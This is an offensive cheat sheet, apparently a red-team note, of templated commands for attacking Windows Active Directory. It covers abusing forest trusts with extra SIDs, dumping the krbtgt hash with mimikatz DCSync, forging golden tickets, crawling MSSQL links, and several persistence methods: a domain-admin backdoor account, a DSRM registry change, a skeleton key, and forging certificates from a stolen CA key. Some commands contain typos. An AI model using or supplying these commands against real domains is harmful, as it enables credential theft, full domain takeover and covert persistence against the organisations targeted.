- # MY FOREST TO YOUR FOREST ;) extra sid
- Get-DomainSID -Domain {DOMAIN}
- Get-DomainSID -Domain {TARGET}
- Filter SID
- Get-DomainGroupMember -Identify "{GROUP}" -Domain {TARGET}
- mimikatz lsadump::dcsync /domain:{DOMAIN} /user:{DOMAIN}\krbtgt
- mimikatz kerberos::golden /user:Administrator /krbtgt:{KRBTGT_HASH} /domain:{DOMAIN} /sid:{USERSID} /sids:{ROOTSID}-{GROUPSIDSUP1000} /ptt
- # COMPROMISE forest to forest (MSSQL)
- Get-SQLServerLinkCrawl -username {USER} -password {PASS} -Verbose -Instance {SQLINSTANCE}
- mssqlclient.py -windows-auth {DOMAIN}/{USER}:{PASSWORD}@{IP}
- TRUSTLINK/SP_LINKEDSERVERS/USE_LINK
PERSISTENCE
why not?
Persistence in cybersecurity occurs when a threat actor discreetly maintains long-term access to systems despite disruptions such as restarts or changed credentials. Bad actors can place an implant or a “stub” that both evades automated antivirus solutions and kickstarts more malware.
- # TICKETS
- net group "domain admins" gary23w /add /domain
- gold
- ticketer.py -aesKey {AESKEY} -domain-sid {DOMAINSID} -domain {DOMAIN} {ANY}
- mimikatz "kerberos::golden /sid:{CURRENTUSERSID} /domain:{DOMAIN} /sid:{DOMAINSID}/aes256:{KIRBAES256} /ptt"
- Powershell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -ProperType DWORD
- MIMIKATZ PASSWORD: mimikatz
- mimikatz "privilege::debug" "misc::skeleton"
- certipy ca -backup -ca '{CANAME}' -username {USER}@{DOMAIN} -hashes {HASH}
- certipy forge -ca-pfx {CAPRIVATEKEY} -upn {USER}@{DOMAIN} -subject 'CN={USER},CN=Users,DC={COMP},DC={LOCAL}
- TODO: add more